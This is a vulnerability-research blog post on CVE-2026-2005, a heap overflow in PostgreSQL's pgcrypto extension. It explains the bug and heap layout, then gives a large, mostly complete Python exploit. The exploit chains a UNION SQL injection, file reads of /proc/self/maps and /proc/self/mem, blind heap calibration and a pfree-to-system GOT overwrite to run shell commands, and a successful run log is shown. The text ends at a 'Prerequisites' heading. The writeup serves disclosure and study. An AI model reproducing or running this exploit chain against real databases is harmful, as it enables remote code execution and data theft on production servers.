Go Back

Smashing pgcrypto for fun and profit: Analyzing and exploiting CVE-2026-2005

Today's blog post tells our journey of exploring, analyzing and even exploiting to some point the heap buffer overflow vulnerability affecting Postgres, discovered during the recent 0day.cloud competition. This vulnerability seized our interest immediately because of its potential of turning an SQL query (practically SQLi) into a full-on remote command execution. (popping a calc like they used to say).

This post is intended to entertain AppSec engineers, low-level enthusiasts, vulnerability researchers, and every other curious fella out there who likes breaking mission-critical software 🤘.

PostgreSQL is probably the most popular open-source relational database in production today. It runs behind everything, from small web apps to massive financial systems. One of its selling points is its extension ecosystem - modular libraries that add functionality to the core database. pgcrypto is one of those extensions. It ships with PostgreSQL itself and provides cryptographic functions: hashing, symmetric encryption, and PGP (Pretty Good Privacy) message encryption and decryption.

PGP is one of those protocols that has been around forever. It wraps data in a layered packet format: you have key packets, encrypted session key packets, and encrypted data packets, all described in RFC 4880. The core flow for public-key decryption is: RSA-decrypt the session key from the first packet, then use that session key to AES-decrypt the actual data from the second packet.

pgcrypto implements this from scratch in C, inside the PostgreSQL server process. No sandboxing, no privilege separation. If something goes wrong in pgcrypto's code, it goes wrong with the full privileges of the database server.

And something went wrong! CVE-2026-2005 is a heap buffer overflow in pgcrypto's PGP public-key decryption path. A missing bounds check on the RSA-decrypted session key allows an attacker to write up to 210 bytes past the end of a 32-byte buffer, corrupting adjacent heap allocations. This post walks through our attempt to turn that into a reliable-ish, fully remote code execution exploit: one that can be delivered entirely through a SQL injection vulnerability in a web application, without the attacker ever connecting to PostgreSQL directly.

Before we get into the exploit, a quick primer on what "heap buffer overflow" actually means for anyone who hasn't spent their weekends staring at memory layouts.

A brief detour: heaps and overflows

When a program needs memory at runtime, it asks the operating system's heap allocator for a chunk. The allocator carves up a large region of memory into smaller blocks and hands them out on request. When you call malloc(184) in C, you get back a pointer to at least 184 usable bytes. The allocator almost never hands you exactly what you asked for, though.

Real allocators are organized around bins: pre-sized buckets of free chunks. When a request comes in, the allocator rounds the size up to the nearest bin and returns a chunk from there. Rounding lets it reuse freed chunks quickly (same-size requests come back to the same bin) and keeps allocation metadata simple. The bins themselves are a fixed staircase of sizes: common schemes are powers of two (8, 16, 32, 64, …) or fine-grained steps for small sizes plus coarser steps for large ones.

For this bug, the allocator that matters is PostgreSQL's AllocSet (PostgreSQL doesn't call malloc directly for short-lived allocations; it has its own pool allocator with a wrapper called palloc). AllocSet uses power-of-two bins indexed by fidx, where freelist fidx holds chunks of size 1 << (fidx + 3): 8, 16, 32, 64, 128, 256, 512, …, up to 8192 bytes. So when pgcrypto calls palloc(sizeof(PGP_Context)) with sizeof(PGP_Context) = 184, the allocator rounds up to the next bin fidx = 5, 256 bytes -and returns a chunk from that freelist. The 72 bytes of slack between the struct's end (offset 184) and the chunk's end (offset 256) are dead padding, but they live inside the same chunk and are physically adjacent to whatever the allocator hands out next.

That last sentence is the point. Allocations from the same bin sequence end up adjacent in memory:

[chunk A] [chunk B] [chunk C]

A heap buffer overflow happens when code writes more data into chunk A than the chunk can hold. The excess spills into chunk B and possibly chunk C, corrupting whatever data structures live there. If an attacker controls what gets written (the overflow content) and there are useful data structures in the adjacent chunks (function pointers, buffer descriptors, etc.), this can be turned into code execution. The overflow distance is measured in chunk sizes, not struct sizes -a fact we'll lean on heavily in the next section.

The bug

The vulnerability lives in pgp_parse_pubenc_sesskey() in contrib/pgcrypto/pgp-pubdec.c. When PostgreSQL decrypts a PGP message using a public key, it RSA-decrypts the session key packet and copies the result into a buffer on the PGP_Context structure:

ctx->cipher_algo = *msg;
ctx->sess_key_len = msglen - 3;
memcpy(ctx->sess_key, msg + 1, ctx->sess_key_len);

sess_key is a 32-byte fixed buffer (uint8 sess_key[PGP_MAX_KEY]) sitting near the end of PGP_Context. The msg pointer comes from RSA-decrypted PKCS#1 v1.5 plaintext - essentially, the raw bytes that were encrypted inside the PGP message. For an RSA-2048 key, this plaintext can be up to 245 bytes (256 minus the minimum 11 bytes of PKCS#1 padding). After subtracting 3 bytes of protocol overhead (1 algorithm byte + 2 checksum bytes), sess_key_len can reach 242. That's 210 bytes past the end of the 32-byte buffer.

There is no length check between the RSA decryption and the memcpy.

The particularly nice thing about this bug (from an attacker's perspective): you only need the public key. The attacker constructs whatever payload they want, pads it with PKCS#1 v1.5, encrypts it with the RSA public key, and wraps it in a PGP packet. The server decrypts with the private key, recovers the oversized plaintext, and dutifully memcpys it into the 32-byte buffer. The 2-byte checksum at the end is trivially satisfied since the attacker controls the entire plaintext.

Kudos to Team Xint Code for finding and disclosing this as part of the zeroday.cloud competition!

Taint flow to the sink

To make the bug concrete, here's the data-flow from attacker input to the memcpy. Everything from row 1 onward is attacker-controlled, there is no sanitization step where the taint dies, only checks that fail to bound the length.

# Variable / call Where it comes from Taint
1 msg_bytea First argument to pgp_pub_decrypt_bytea(msg_bytea, key) -direct from SQL source
2 RSA ciphertext c pgp_mpi_read(pkt, &c) parses an MPI out of msg_bytea tainted
3 RSA plaintext m pgp_rsa_decrypt(pk, c, &m) -but the attacker chose c such that decryption produces m = 0x00 ‖ 0x02 ‖ PS ‖ 0x00 ‖ payload tainted
4 msg msg = check_eme_pkcs1_v15(m->data, m->bytes) returns the byte after the 0x00 separator. Validates only the leading 0x02 and ≥8 padding bytes tainted (pointer)
5 msglen msglen = m->bytes - (msg - m->data) -payload length, derived from the attacker-chosen RSA plaintext tainted (size)
6 ctx->sess_key_len msglen - 3 (algo byte + 2-byte checksum). Checksum is also in attacker bytes, so it's trivially passed tainted (size, unbounded)
7 Sink 1 memcpy(ctx->sess_key, msg + 1, ctx->sess_key_len) at pgp-pubdec.c:228. ctx->sess_key is a fixed 32-byte field; both source bytes and length are attacker-tainted → heap buffer overflow sink

After Sink 1 fires, the spillover bytes have rewritten the adjacent src and dst MBuf descriptor structs (chunk layout in the next section). Execution doesn't stop there, pgp_decrypt continues into the second PGP packet, with the corrupted MBufs now in the data path:

# Variable / call Where it comes from Taint
8 src->read_pos, dst->data_end, dst->buf_end written by Sink 1's overflow at fixed offsets within the spilled bytes tainted (pointers)
9 AES-CFB plaintext stream symmetric decrypt of the second PGP packet, under a key copied from the same overflow bytes (sess_key[0:16]) - attacker pre-computed the ciphertext tainted
10 buf, len in mbuf_append(dst, buf, len) parsed LITERAL_DATA body from the AES-CFB stream tainted
11 Sink 2 memcpy(dst->data_end, buf, len) inside mbuf_append (mbuf.c:104). All three of destination, source bytes, and length are tainted → arbitrary write sink

Two sinks, reached entirely from a single pgp_pub_decrypt_bytea(...) call -meaning a single SQL injection hop. Sink 1 is the primitive the CVE actually describes; Sink 2 is what the corrupted MBuf state turns Sink 1 into. The rest of the post is plumbing on top of Sink 2.

Figure 1: Taint flow from SQL argument to memory-corruption sinks Figure 1: Data-dependency chain from the msg_bytea SQL argument through both sinks. The yellow check_eme_pkcs1_v15 step is the only validation in the path, and it only inspects the PKCS#1 envelope shape -it never bounds msglen, so the taint flows past it (gold dashed arrow). Sink 1 is the CVE itself; Sink 2 is the arbitrary-write primitive it builds.

What's next door on the heap

210 bytes of overflow is a lot, but it's only useful if there's something interesting to corrupt in the adjacent memory. We needed to understand exactly what gets allocated right after PGP_Context.

The function decrypt_internal() in pgp-pgsql.c is the SQL-callable entry point. It allocates three main objects in sequence:

init_work(&ctx, ...);                    // palloc0(sizeof(PGP_Context))  = palloc0(184)
src = mbuf_create_from_data(data, len);  // palloc(sizeof(MBuf))          = palloc(40)
dst = mbuf_create(data_size + 2048);     // palloc(sizeof(MBuf)) + palloc(data_size + 2048)

ctx is the PGP context structure (where the overflow originates). src is a memory buffer descriptor pointing at the input ciphertext. dst is a memory buffer descriptor for the decrypted output. On a fresh query, PostgreSQL's AllocSet allocator serves these from consecutive positions in the same block:

[BlockHdr(40)] [ChunkHdr(8)|ctx(256)] [ChunkHdr(8)|src(64)] [ChunkHdr(8)|dst(64)] [ChunkHdr(8)|dst_data(N)]

The numbers in parentheses are chunk sizes, not struct sizes. AllocSet rounds up to the next power of 2: sizeof(PGP_Context) = 184 rounds to 256, sizeof(MBuf) = 40 rounds to 64. Each chunk is prefixed by an 8-byte MemoryChunk header that the allocator uses to track ownership.

Here's the key insight that takes a while to internalize: the overflow distance is determined by the chunk size (256), not the struct size (184). There are 72 bytes of dead padding between the end of the struct and the start of src. The overflow sails through this padding, over the chunk header, and lands on src's pointer fields. It then continues through src's 64-byte chunk and into dst.

There's also a lucky detail: mbuf_create_from_data does not allocate a separate data buffer, it just wraps an existing pointer. So there's no intervening allocation between src and dst. The layout is tight: ctx | src_MBuf | dst_MBuf, all reachable from a single overflow.

Confirming everything with holy GDB:

sizeof(PGP_Context) = 184    sess_key at offset 148
sizeof(MBuf)        = 40     (data, data_end, read_pos, buf_end, no_write, own_data)
sizeof(MemoryChunk) = 8      (just the hdrmask)

From sess_key[0], the src MBuf's data pointer sits at overflow byte 116, and dst's at byte 188. Both well within our 222-byte reach.

Figure 2: palloc heap layout during pgp_decrypt() Figure 2: palloc heap layout. The 256B ctx chunk is followed immediately by the 64B src MBuf chunk and dst MBuf chunk. The overflow from sess_key at struct offset +148 crosses both boundaries; payload bytes at +108, +116, +180, +188 reprogram both MBuf descriptors.


Turning decryption into an arbitrary write

This is where things get interesting. After the overflow corrupts both MBuf structs, execution doesn't stop, it continues into pgp_decrypt(), which processes the second PGP packet in the message (the SYMENCRYPTED_DATA packet). The decryption pipeline reads ciphertext from src and writes plaintext to dst. We control both of those now.

The call chain is: parse_symenc_data() sets up AES-128-CFB decryption using ctx->sess_key (which we just overwrote with bytes 0-15 of our payload). Then process_data_packets() parses the decrypted stream, finds a LITERAL_DATA packet, and parse_literal_data() calls mbuf_append(dst, buf, len) which writes at dst->data_end.

So the pipeline becomes: 1. Read ciphertext from where src->read_pos points (we control this) 2. AES-CFB decrypt with our chosen key (we control this) 3. Parse the decrypted stream as PGP packets 4. Write the LITERAL_DATA body to where dst->data_end points (we control this)

We control the key and the ciphertext, so we can pre-compute the ciphertext such that after decryption, it produces a valid PGP LITERAL_DATA packet containing whatever bytes we want. Thus, the decryption pipeline becomes our write primitive.

To make this work, PGP's CFB "resync" mode had to be reimplemented in Python. PGP doesn't use standard CFB, after the second block (which is only 2 bytes), it shifts the feedback register with encbuf[2:16] + encbuf[0:2]. We spent some time getting this right before the encrypt/decrypt routine round-tripped correctly. The implementation is in pgp_cfb_encrypt_resync() for the curious.

One important subtlety: the PGP prefix check. The first 18 decrypted bytes are a "prefix" where bytes 14-15 must match bytes 16-17. They mismatch deliberately, which sets ctx->corrupt_prefix = 1. But this is a deferred error: the pipeline processes all the data (including our write) before checking the flag. By the time pgp_decrypt returns "corrupt data", mbuf_append has already written our payload to the target address.

This gives us an arbitrary write of controlled data to a controlled address, with the small constraint that the data passes through the PGP packet parser (~8 bytes of framing overhead per write).

Figure 3: MBuf fields before and after overflow Figure 3: src MBuf redirected to the attacker's ciphertext in the SQL execution buffer; dst MBuf redirected to an arbitrary write target. The decryption pipeline then runs normally, reading from src and writing to dst.

GOT hijack

Now there is an arbitrary write. The question is: what to write where?

Well, you can go with a classic approach: overwrite [email protected] in pgcrypto.so with system@libc.

For readers not steeped in binary exploitation: shared libraries (.so files) use a mechanism called the Global Offset Table (GOT) to call external functions. When pgcrypto calls pfree() (PostgreSQL's memory deallocation function), it doesn't jump directly, it looks up the address in the GOT and jumps there. If we overwrite that GOT entry with the address of system() (the libc function that executes shell commands), then every subsequent pfree(ptr) becomes system(ptr).

pgcrypto calls pfree all over its cleanup paths. The relevant code in mbuf_free():

if (mbuf->own_data) {
    px_memset(mbuf->data, 0, mbuf->buf_end - mbuf->data);
    pfree(mbuf->data);    // after GOT overwrite: system(mbuf->data)
}
pfree(mbuf);

The attack is three pipeline writes:

  1. Write the address of system@libc (8 bytes) to pfree@GOT
  2. Write a command string ("touch /tmp/pwned\0") to a safe location in pgcrypto's .bss section (a region of writable static memory)
  3. Trigger: send an overflow where dst->data = .bss_cmd_addr, dst->own_data = 1, and dst->buf_end = dst->data (so px_memset zeroes 0 bytes - a no-op). When cleanup calls mbuf_free(dst), it executes pfree(.bss_cmd) which is now system("touch /tmp/pwned").

The intermediate pfree calls on other heap pointers during cleanup execute system(garbage_heap_address), which just produces "sh: syntax error" and returns harmlessly.

Resolving addresses without hardcoding anything

The initial version of this exploit had hardcoded offsets for pfree@GOT, system@libc, .bss, and all the struct sizes. It worked on my build, but changing compiler flags, updating libc, or even recompiling PostgreSQL would break everything.

I wanted zero hardcoded binary offsets. The fix: resolve everything at runtime by reading the target's own binaries through SQL.

PostgreSQL has two built-in file-read functions available to users with the pg_read_server_files role:

pg_read_file('/proc/self/maps')              -- text file read
pg_read_binary_file('/path/to/file', off, n) -- binary read with offset

From /proc/self/maps we get library base addresses and filesystem paths. Then we read the actual .so files from disk and parse their ELF structures - the standard binary format on Linux.

  • pfree@GOT: Parse pgcrypto.so's PT_DYNAMIC segment to find the .rela.plt relocation table, then scan entries matching the pfree symbol. I used the DYNAMIC segment instead of section headers because it survives aggressive stripping. Takes ~5 SQL queries.
  • system@libc: Parse libc.so's .dynsym + .dynstr symbol tables to find system's virtual address offset. Another 5 queries.
  • .bss: Parse pgcrypto.so's section headers for the .bss address and size. 3 queries.

Struct sizes from disassembly

This was the part we were most pleased with. The overflow field offsets depend on sizeof(PGP_Context), sizeof(MBuf), and the sess_key offset within the struct, all of which vary between builds. Instead of shipping precomputed offset tables (like kernel exploits often do), the exploit reads the machine code of three functions from pgcrypto.so and extracts the palloc size arguments directly:

pgp_init():                    bf b8 00 00 00    mov $0xb8, %edi     -> sizeof(PGP_Context) = 184
mbuf_create_from_data():       bf 28 00 00 00    mov $0x28, %edi     -> sizeof(MBuf) = 40
pgp_parse_pubenc_sesskey():    48 05 94 00 00 00 add $0x94, %rax     -> sess_key offset = 148

The pattern matching scans for 0xbf (mov imm32 to edi) before call instructions, and 0x48 0x05 (add imm32 to rax) before the memcpy call. From these three numbers, compute_overflow_layout() calculates every overflow field offset and the two MemoryChunk hdrmask values using the AllocSet encoding formula:

hdrmask = (block_offset << 34) | (freelist_index << 5) | MCTX_ASET_ID

The hdrmask encodes which allocator block and freelist bucket own each chunk. Get it wrong and pfree crashes trying to find the owning memory context. Get it right and cleanup proceeds normally. The backend survives and the GOT write persists for future queries.

Blind heap calibration (and the 29KB surprise)

The pipeline write needs to know where the SQL argument's bytea data lives on the heap. Specifically, src->read_pos must point at the SYMENCRYPTED_DATA packet within that bytea. This address varies between PostgreSQL restarts because of ASLR and allocator state.

Our approach: blind .bss probing. For each candidate heap offset, send a pipeline write attempting to write a marker string to a known .bss address, then read .bss via /proc/self/mem to check if the marker landed. Wrong guesses produce a PGP error but no crash, the backend survives and the connection stays alive.

The search uses a spiral pattern outward from a center estimate, stepping by 8 bytes (matching palloc's alignment). On direct PostgreSQL connections this was fast: about 29 probes to lock the offset.

Then we tried to run it through the SQL injection chain and it stopped working.

We spent way too long debugging this. The direct exploit (parameterized queries via psycopg) found the offset at heap + 0x9D394. The SQLi exploit (inline decode('hex','hex') through the web app) found... nothing. 4000 probes, all misses. I added verbose logging, dumped .bss after every probe, verified the payload bytes were identical. Still nothing.

Eventually our lord and saviour GDB caught the actual address: heap + 0x195D3C. That's ~1MB deeper into the heap. The SQL parser and executor allocate tons of intermediate structures when processing an inline decode('deadbeef...', 'hex') literal containing hundreds of hex characters. Those allocations push the bytea argument much further into the heap compared to a parameterized query.

But it got worse. We switched from file-based PGP keys (2522-byte secret key) to attacker-generated keys (1846-byte secret key) and the offset jumped by another 29KB. The second bytea argument (the secret key) is also palloc'd, and its size changes the allocation pattern for everything after it. Mixing key sizes between calibration and the real exploit causes silent failure, the pipeline write targets the wrong address and nothing happens.

The final parameters: center at 0x199580 (midpoint of observed range), ±32KB range, 8-byte steps. Typically finds it in ~3600 probes with zero crashes. Not the fastest, but kinda reliable.

The full SQLi chain

Putting it all together. The demo target is a web application with a UNION-based SQL injection in a search endpoint. The PostgreSQL backend has pgcrypto loaded and the database user has pg_read_server_files.

  1. Recon (3 HTTP requests): SELECT version(), verify pgcrypto is installed, force the .so to load via digest()
  2. Key generation (0 requests): Generate an RSA-2048 keypair locally in PGP format. No database keys needed - the attacker brings their own.
  3. ASLR bypass (1 request): pg_read_file('/proc/self/maps') through the injection
  4. Binary analysis (~15 requests): Parse ELF structures of pgcrypto.so and libc.so to resolve pfree@GOT, system@libc, .bss, and struct sizes
  5. Heap calibration (~3600 requests): Blind .bss probe spiral to find the bytea heap address
  6. GOT overwrite (1 request): Pipeline write system@libc to pfree@GOT, verified via /proc/self/mem
  7. Command write (1 request): Pipeline write command string to .bss, verified
  8. Trigger (1 request): pfree(.bss_cmd) -> system(cmd)

The webapp's persistent database connection is critical since every HTTP request hits the same PostgreSQL backend process, so the GOT overwrite from step 6 is still in effect when step 8 fires.

The PoC

To demonstrate the full chain, we built a small Flask web application (webapp.py) that simulates a product catalog backed by PostgreSQL with pgcrypto. It has a /search endpoint with a textbook SQL injection: user input interpolated directly into a query.

sql = f"SELECT id, name, description, price FROM products WHERE name ILIKE '%{q}%'"

The app runs in single-threaded mode with a persistent psycopg2 connection, so every HTTP request from the attacker hits the same PostgreSQL backend. This is what makes the multi-step attack possible: the GOT overwrite from step 6 is still in memory when step 8 fires.

Here is the proof-of-concept exploit, followed by a walkthrough of the important parts:

import os, sys, struct, hashlib, time, argparse, requests
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

OVERFLOW_SIZE = 222
PGP_PKT_SESSKEY = 1
PGP_PKT_SYMENC = 9
PGP_PKT_LITERAL = 11
PGP_SYM_AES128 = 7

# PGP packet construction

def old_pkt(tag, body):
    n = len(body)
    if n < 256: hdr = bytes([0x80|(tag<<2)|0, n])
    elif n < 65536: hdr = bytes([0x80|(tag<<2)|1]) + struct.pack('>H', n)
    else: hdr = bytes([0x80|(tag<<2)|2]) + struct.pack('>I', n)
    return hdr + body

def mpi_enc(v):
    return struct.pack('>H', v.bit_length()) + v.to_bytes((v.bit_length()+7)//8, 'big')

def pkcs1_encrypt(M, n, e):
    nb = (n.bit_length()+7)//8
    ps = b''
    while len(ps) < nb-3-len(M):
        b = os.urandom(1)
        if b != b'\x00': ps += b
    return pow(int.from_bytes(b'\x00\x02'+ps+b'\x00'+M, 'big'), e, n)

def build_sesskey_pkt(key_id, n, e, algo, sesskey_bytes):
    ck = sum(sesskey_bytes) & 0xFFFF
    M = bytes([PGP_SYM_AES128]) + sesskey_bytes + struct.pack('>H', ck)
    return old_pkt(PGP_PKT_SESSKEY, bytes([3]) + key_id + bytes([algo]) + mpi_enc(pkcs1_encrypt(M, n, e)))

def build_plaintext(data, fail_prefix=True):
    pfx = bytearray(os.urandom(14))
    pfx += bytes([0xAA,0xBB,0xCC,0xDD]) if fail_prefix else bytes([0xAA,0xBB,0xAA,0xBB])
    return bytes(pfx) + old_pkt(PGP_PKT_LITERAL, bytes([0x62,0x00]) + b'\x00\x00\x00\x00' + data)

# PGP CFB resync mode

def aes_ecb(key, block):
    c = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return c.update(block) + c.finalize()

def pgp_cfb_encrypt(key, pt, bs=16):
    fr, encbuf = bytearray(bs), bytearray(bs)
    pos = blk = idx = 0; rem = len(pt); ct = bytearray()
    while rem > 0:
        while rem > 0 and pos > 0:
            n = min(bs-pos, rem)
            if blk == 2:
                n2 = min(2-pos, n)
                for j in range(n2):
                    c = fre[pos+j]^pt[idx+j]; encbuf[pos+j]=c; ct.append(c)
                pos+=n2; idx+=n2; rem-=n2
                if pos==2: fr=bytearray(encbuf[2:bs])+bytearray(encbuf[0:2]); pos=0; break
            else:
                for j in range(n):
                    c = fre[pos+j]^pt[idx+j]; encbuf[pos+j]=c; ct.append(c)
                pos+=n; idx+=n; rem-=n
            if pos==bs: fr=bytearray(encbuf[:bs]); pos=0
        if rem <= 0: break
        fre = bytearray(aes_ecb(key, bytes(fr)))
        if blk < 5: blk += 1
        n = min(bs, rem)
        if blk == 2:
            n2 = min(2, n)
            for j in range(n2):
                c = fre[j]^pt[idx+j]; encbuf[j]=c; ct.append(c)
            pos=n2; idx+=n2; rem-=n2
            if pos==2: fr=bytearray(encbuf[2:bs])+bytearray(encbuf[0:2]); pos=0
        else:
            for j in range(n):
                c = fre[j]^pt[idx+j]; encbuf[j]=c; ct.append(c)
            pos=n; idx+=n; rem-=n
            if pos==bs: fr=bytearray(encbuf[:bs]); pos=0
    return bytes(ct)

# overflow payload builders

def build_overflow(L, skey, sql_addr, p1len, symenc_len, target):
    p = bytearray(OVERFLOW_SIZE)
    p[0:16] = skey; p[16:32] = b'\x00'*16
    struct.pack_into('<I', p, L['off_sess_key_len'], 16)
    ss = sql_addr + p1len
    st = symenc_len + (3 if symenc_len >= 256 else 2)
    struct.pack_into('<Q', p, L['off_src_hdrmask'], L['src_hdrmask'])
    struct.pack_into('<Q', p, L['off_src_data'], sql_addr)
    struct.pack_into('<Q', p, L['off_src_data_end'], ss+st)
    struct.pack_into('<Q', p, L['off_src_read_pos'], ss)
    struct.pack_into('<Q', p, L['off_src_buf_end'], ss+st)
    p[L['off_src_no_write']]=1; p[L['off_src_own_data']]=0
    struct.pack_into('<Q', p, L['off_dst_hdrmask'], L['dst_hdrmask'])
    struct.pack_into('<Q', p, L['off_dst_data'], target)
    struct.pack_into('<Q', p, L['off_dst_data_end'], target)
    struct.pack_into('<Q', p, L['off_dst_read_pos'], target)
    struct.pack_into('<Q', p, L['off_dst_buf_end'], target+0x1000)
    p[L['off_dst_no_write']]=0; p[L['off_dst_own_data']]=0
    return bytes(p)

def build_trigger(L, cmd_addr):
    p = bytearray(OVERFLOW_SIZE)
    struct.pack_into('<I', p, L['off_sess_key_len'], OVERFLOW_SIZE)
    struct.pack_into('<Q', p, L['off_src_hdrmask'], L['src_hdrmask'])
    for o in (L['off_src_data'],L['off_src_data_end'],L['off_src_read_pos'],L['off_src_buf_end']):
        struct.pack_into('<Q', p, o, 0x1)
    p[L['off_src_no_write']]=1; p[L['off_src_own_data']]=0
    struct.pack_into('<Q', p, L['off_dst_hdrmask'], L['dst_hdrmask'])
    for o in (L['off_dst_data'],L['off_dst_data_end'],L['off_dst_read_pos'],L['off_dst_buf_end']):
        struct.pack_into('<Q', p, o, cmd_addr)
    p[L['off_dst_no_write']]=1; p[L['off_dst_own_data']]=1
    return bytes(p)

# attacker keypair

def gen_keypair():
    sk = rsa.generate_private_key(65537, 2048, default_backend())
    pn = sk.private_numbers()
    n, e, d, p, q = pn.public_numbers.n, pn.public_numbers.e, pn.d, pn.p, pn.q
    u = pow(p, -1, q)
    pub = b'\x04\x00\x00\x00\x00' + bytes([2]) + mpi_enc(n) + mpi_enc(e)
    kid = hashlib.sha1(b'\x99' + struct.pack('>H', len(pub)) + pub).digest()[-8:]
    sec = mpi_enc(d) + mpi_enc(p) + mpi_enc(q) + mpi_enc(u)
    body = pub + b'\x00' + sec + struct.pack('>H', sum(sec)%65536)
    lh = struct.pack('>H', len(body))
    return n, e, kid, 2, b'\x95'+lh+body+b'\x9d'+lh+body

# ELF resolution

def _elf_rb(path, url=None):
    def rb(off, sz):
        h = sqli_query(f"SELECT encode(pg_read_binary_file('{path}',{off},{sz}),'hex')", url)
        return bytes.fromhex(h) if h else b''
    return rb

# ... resolve_sym_libc, resolve_got_slot, resolve_bss, resolve_structs,
#     compute_layout (~160 lines of ELF parsing + x86 disassembly)
#     See full source for details.

# SQLi primitives

TARGET_URL = "http://localhost:8080"
SESSION = requests.Session()

def sqli_query(expr, url=None):
    try:
        r = SESSION.post(f"{url or TARGET_URL}/search",
            data={"q": f"' UNION SELECT 1,({expr})::text,'x',1 --"}, timeout=30)
        if r.status_code == 200:
            for row in r.json().get("results",[]):
                if str(row.get("description"))=="x": return row.get("name")
        return None
    except Exception: return None

def sqli_blind(expr, url=None):
    try:
        r = SESSION.post(f"{url or TARGET_URL}/search",
            data={"q": f"' UNION SELECT 1,({expr})::text,'x',1 --"}, timeout=30)
        if r.status_code == 200: return True, None
        if r.status_code == 503: return False, "crashed"
        try: d = r.json().get("detail","")
        except Exception: d = r.text[:200]
        return True, d
    except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
        return False, "connection_error"
    except Exception as e: return True, str(e)

def bytea_lit(d): return f"decode('{d.hex()}','hex')"
def read_maps(url=None): return sqli_query("SELECT pg_read_file('/proc/self/maps')", url)
def read_mem(a, n, url=None):
    h = sqli_query(f"SELECT encode(pg_read_binary_file('/proc/self/mem',{a},{n}),'hex')", url)
    return bytes.fromhex(h) if h else None
def send_overflow(msg, key, url=None):
    return sqli_blind(f"pgp_pub_decrypt_bytea({bytea_lit(msg)},{bytea_lit(key)})::text", url)

# calibration + GOT overwrite

def calibrate_and_got_write(kid, n, e, algo, sk, heap, got, sysaddr, skey, L, bss_probe, url=None):
    got_ct = pgp_cfb_encrypt(skey, build_plaintext(struct.pack("<Q",sysaddr), fail_prefix=True))
    p1len = len(build_sesskey_pkt(kid,n,e,algo,bytes(OVERFLOW_SIZE)))
    marker = b"CALIBRATE_OK"
    probe_ct = pgp_cfb_encrypt(skey, build_plaintext(marker, fail_prefix=True))

    def spiral(c, hr, s):
        for d in range(0,hr,s):
            yield c+d
            if d: yield c-d
    def probe(off):
        a = heap+off+4
        try: ov = build_overflow(L, skey, a, p1len, len(probe_ct), bss_probe)
        except: return False, False
        for _ in range(5):
            p1 = build_sesskey_pkt(kid,n,e,algo,ov)
            if len(p1)==p1len: break
        else: return False, False
        ok,_ = send_overflow(p1+old_pkt(PGP_PKT_SYMENC, probe_ct), sk, url)
        if not ok: return False, True
        d = read_mem(bss_probe, len(marker)+8, url)
        return (d is not None and marker in d), False

    # spiral outward from center, 8-byte steps, +/-32KB
    hit = None
    for off in spiral(0x199580, 0x8000, 0x08):
        h, crashed = probe(off)
        if crashed: wait_reconnect(url); continue
        if h: hit=off; break
    if hit is None: return None, None

    # fine-tune
    for off in spiral(hit, 0x40, 0x08):
        h,_ = probe(off)
        if h: hit=off; break

    addr = heap+hit+4
    # GOT overwrite
    for _ in range(20):
        ov = build_overflow(L, skey, addr, p1len, len(got_ct), got)
        p1 = build_sesskey_pkt(kid,n,e,algo,ov)
        if len(p1)==p1len: break
    send_overflow(p1+old_pkt(PGP_PKT_SYMENC, got_ct), sk, url)

    g = read_mem(got, 8, url)
    if g and struct.unpack("<Q",g)[0]==sysaddr:
        return addr, p1len
    return None, None

# main: ties it all together
def main():
    # 1. Verify SQLi, check pgcrypto
    # 2. gen_keypair()
    # 3. read_maps() -> ELF resolution (system, pfree@GOT, .bss, struct sizes)
    # 4. calibrate_and_got_write() -> blind probe + GOT overwrite
    # 5. Pipeline write command to .bss
    # 6. Trigger: pfree(.bss_cmd) -> system(cmd)

The ELF resolution functions (resolve_sym_libc, resolve_got_slot, resolve_bss, resolve_structs, compute_layout) are omitted from the listing for brevity as they're 160 lines of ELF parsing and x86 disassembly that read pgcrypto.so and libc.so from disk via SQL. See the full source in the repository.

Here's what the important pieces do:

  • sqli_query / sqli_blind: the injection primitives. Every interaction with PostgreSQL goes through these two functions. sqli_query returns data (used for reading /proc, ELF parsing, memory verification). sqli_blind fires side-effect queries (the overflow itself) and reports whether the backend survived. The injection template is always ' UNION SELECT 1,(EXPR)::text,'x',1 --, where the 'x' marker identifies the injected row in the JSON response.
  • gen_keypair: generates a fresh RSA-2048 keypair in OpenPGP binary format. The secret key is bundled as both a SECRET_KEY (tag 5) and SECRET_SUBKEY (tag 7) packet - pgcrypto skips the former and uses the latter. This means the attacker doesn't need to extract keys from the database; they bring their own.
  • build_overflow: constructs the 222-byte overflow payload. The first 16 bytes become the AES-128 session key. Bytes at the dynamically computed offsets overwrite src and dst MBuf structs: src->read_pos points at the SYMENCRYPTED_DATA ciphertext in the SQL argument, dst->data_end points at the write target (pfree@GOT or .bss). The MemoryChunk hdrmask values are computed from the AllocSet block layout so that pfree() during cleanup doesn't crash.
  • build_trigger: a simpler overflow for the final step. Sets dst->data = .bss_cmd_addr and dst->own_data = 1, with buf_end == data so px_memset zeroes 0 bytes. When mbuf_free(dst) runs during cleanup, it calls pfree(.bss_cmd) - which is now system("touch /tmp/pwned").
  • calibrate_and_got_write: the heart of the exploit. Sends ~3600 probes in a spiral pattern, each attempting a pipeline write of "CALIBRATE_OK" to a .bss address, then reads .bss via /proc/self/mem to check if the marker landed. Once the heap offset is found, it immediately sends the real payload: system@libc (8 bytes) written to pfree@GOT via the AES-CFB pipeline. The GOT overwrite is verified by reading the GOT entry back through /proc/self/mem.

A successful run:

Target: http://localhost:9090  Cmd: touch /tmp/pwned
PostgreSQL 19devel on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2....
Key: bdb15bc47a7797f5
pgcrypto=0x7ffff4fc4000 libc=0x7ffff773e000 heap=0x5555561af000
GOT=0x7ffff4fec060 system=0x7ffff778a490 bss=0x7ffff4ff66c8
ctx=184B mbuf=40B src@+116 dst@+188
Heap probe (step=0x8, range=+/-0x8000)...
Hit heap+0x19ce28 (3626 probes)
VARDATA: 0x55555634be2c
pfree@GOT = system (0x7ffff778a490)
.bss = "touch /tmp/pwned"
system("touch /tmp/pwned") triggered

$ ls -la /tmp/pwned
-rw------- 1 ed ed 0 Apr  9 02:29 /tmp/pwned

Figure 4: Full SQLi to RCE chain Figure 4: Full SQLi to RCE chain. Each stage flows through the same UNION-based injection primitive; the persistent backend connection carries GOT state across requests.

Prerequisites and constraints

